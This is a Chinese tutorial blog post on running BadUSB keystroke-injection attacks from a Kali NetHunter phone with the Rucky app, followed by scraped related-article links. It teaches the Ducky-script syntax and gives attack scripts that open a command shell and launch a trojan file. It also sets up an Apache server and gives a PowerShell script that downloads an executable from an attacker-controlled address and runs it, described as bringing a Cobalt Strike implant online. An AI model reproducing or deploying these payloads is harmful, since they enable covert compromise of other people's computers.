使用kali nethunter执行badUSB攻击–基于Rucky工具

1、下载工具

从F-Droid商店下载Rucky工具

2、攻击语言语法介绍

参考up主无序熵增进行整理:https://www.bilibili.com/read/cv5472965
特点:指令都为大写

**常用命令:**REM     注释命令DELAY   延时指令   \\如DELAY 100 指每个语句间间隔100msDEFAULT_DELAY 100   默认延时指令    \\在最开始处设置,后面将没给语句间自动间隔100msSTRING   输入字符指令   \\使用:STRING空格加字符串 CAPSLOCK ON  切换大小写指令
**特殊指令:**
REPEAT   重复上一句指令
如:(打字机机器人)
CAPSLOCK ON
DELAY 100
STRING hello nethunter
REPEAT 100
键盘按键:
GUI /WINDOWS     windows菜单键SHIFT            shift键ALT              Alt键CONTROL /CTRL    Ctrl键DOWNARROW /DOWN  下箭头LEFTARROW /LEFT  左箭头RIGHTARROW /RIGHT 右箭头UPARROW /UP       上箭头BREAK /PAUSE      Pause键CAPSLOCK          大写键DELETE            删除键END               END键ESC /ESCAPE       ESC键HOME              Home键INSERT           Insert键NUMLOCK           键盘数字锁键PAGEUP           上翻页键PAGEDOWN         下翻页键PRINTSCREEN      屏幕截屏键SCROLLLOCK       Scrolllock键SPACE            空格键TAB              Tab键

常用执行cmd木马文件脚本:

DEFAULT_DELAY 100
GUI r
STRING cmd
ENTER
ENTER
CAPSLOCK ON
STRING D:
ENTER
STRING start 1.exe
ENTER

3、执行攻击方法

打开Rucky主界面,输入命令,将手机通过数据线线连接目标电脑,传输模式选择==传输文件
点击右下角播放键即可完成攻击,

拓展:执行cs上线脚本实战思路

1、搭建apache文件服务器

(1)修改服务器访问端口
Apache2的默认访问端口为80,由于端口被占用,需要更改其它访问端口
进入apache2的安装目录 /etc/apache2/,修改ports.conf文件

cd /etc/apache2/sudo chmod 775 ports.conf   //任意端口除了80vim ports.conf其中修改Listen 775:wq

(2)删除主页

 cd /var/www/html sudo rm -rf index.html   删除主页html文件

(3)重启apache服务器即可

sudo /etc/init.d/apache2 restart

(4)访问(ip:端口),在/var/www/html 目录下放置文件就可。

2、制作cs免杀脚本:此处不展开介绍

3、上传脚本文件到本地服务器

制作完成后,将脚本文件放置/var/www/html 目录:
(1)用xshell通过ssh连接到kaliLinux的服务器
手机进入nethunter应用,开启SSH服务

查看手机ip

打开xshell,连接

地址:手机ip用户名:kali密码:kali

(2)上传脚本文件

sudo -s    //升级root权限
rz        //上传文件命令

如下图上传了一个1.txt文件

编写badusb攻击脚本

根据范文脚本生成自己的攻击脚本:

DEFAULT_DELAY 100
CAPSLOCK ON
GUI
STRING power
ENTER
ENTER
$client = new-object System.Net.WebClient
$client.DownloadFile('http://192.169.1.41:775/1.exe','D:\1.exe')
STRING D:
ENTER
STRING start 1.exe
ENTER

使用kali nethunter执行badUSB攻击--基于Rucky工具相关推荐

  1. kali linux渗透攻击基于漏洞工具Metasploit

    章节目录 本章节是基于漏洞工具Metasploit做的 什么是Metasploit Meterpreter功能 渗透环境 7.1 Metasploit的基础 1.Metasploit启动的三种方法: ...

  2. 『Kali nethunter系列』手机发起“badUSB”攻击(Rucky,Rucky脚本)

    一个数据线,一个手机,动动手指拿下电脑控制权. 『Kali nethunter系列』手机发起"badUSB"攻击(Rucky,Rucky脚本) 当然不是只有nethunter的设备 ...

  3. Kali Linux NetHunter教程Kali NetHunter支持的设备和ROMs

    Kali Linux NetHunter教程Kali NetHunter支持的设备和ROMs NetHunter是一个基于Kali Linux为Nexus设备构建的Android渗透测试平台,其中包括 ...

  4. 定制 kali nethunter内核 (官方不支持的手机)

    Kali Linux NetHunter内核编译指南 发表于 2021-09-12   更新于 2022-10-08   分类于 kali   阅读次数:   阅读次数: 1890   Valine: ...

  5. Badusb 攻击之MacOSX系统实战

    Badusb 已经出现了很多年,使用usb进行攻击的手段也从最初的利用autorun.inf.伪造文件夹名.快捷方式等手段转为更加难以防御的Badusb.这种攻击方式就是目前可绕过杀毒软件,防御较难. ...

  6. 一加一 安装 Kali NetHunter 详解

    一加一 安装 Kali NetHunter 详解# 2018年4月20日13:02:44 手机:Oneplus one 软件: Kali NetHunter 工具:一加工具包 解读:手机安装 kali ...

  7. oneplus 手机kali linux,OnePlus One(一加1)刷机Kali Nethunter完整教程

    设备信息: 设备名称:OnePlus One(一加1) OS:ColorOS 1.2 设备型号:A0001 目标: 在OnePlus One(一加1)上将 ColorOS 1.2 刷机为 Kali N ...

  8. 跟我把Kali Nethunter编译至任意手机

    lxj616 · 2015/12/08 16:11 Kali Nethunter是一款用于安全研究的手机固件包,可以使Android设备增加"无线破解"."HID攻击&q ...

  9. 什么是BadUSB攻击以及如何预防

    BadUSB 攻击是指 USB 设备存在内置固件漏洞,该漏洞允许自身伪装成人机接口设备.一旦连接到其目标计算机,BadUSB 就可以谨慎地执行有害命令或注入恶意负载. 一种常见的BadUSB攻击类型是 ...

最新文章

  1. 三维重建新应用:精确还原凶杀现场细节!
  2. Spring rabbitmq消息机制--手动确认
  3. build怎么调试 react_webpack打包调试react并使用babel编译jsx配置方法
  4. android path平移,安卓自定义View进阶:Path基本操作(下)
  5. Python输入多行多组数据两个两求和
  6. XP Sp2下双机通过无线网卡实现Internet共享
  7. Port already in use: 1099;
  8. oracle启动文件是什么意思,Oracle数据库的启动——口令文件的作用
  9. sql replace函数_SQL REPLACE函数概述
  10. 漫画:如何给初学者讲“为什么计算机只认识 0 和 1”?
  11. Atitit 我们的devops战略与规划 规范 推荐标准
  12. echarts地图自动轮播
  13. 百度网盘破解版,满速下载不限速【转载,亲测有效】
  14. GPS 校验和 代码_嵌入式Linux平台的GPS数据采集
  15. TensorFlow调整超参数步骤
  16. qchart实现图片缩放 qt_Qt图形图像开发曲线图表模块QChart库缩放/平移详细方法与实例...
  17. (java)Climbing Stairs
  18. vue 报错avoid mutating a prop directly since the value will be overwritten whenever
  19. Photoshop 添加ico图标格式支持
  20. 办公室VR黄片,骚操作!微软HoloLens之父辞职!

热门文章

  1. 7个实用有效的营销策略帮助推动跨境电商DTC品牌业务
  2. Python制作校庆海报
  3. 1月第2周全球域名总量TOP20:开曼群岛升至第九
  4. UINO优锘新slogan“数字孪生,看懂新空间”有何含义?
  5. iOS判断iPhone是否越狱
  6. HVM下的两种模式-用户模式与访客模式
  7. 灵飞经4 西城八部 第二十章 倒行逆施(二)
  8. 系统设计中的四个常用战术
  9. (PC+WAP)带手机端pbootcms模板门窗设计类网站
  10. 五谷为养,五果为助,五畜为益,五菜为充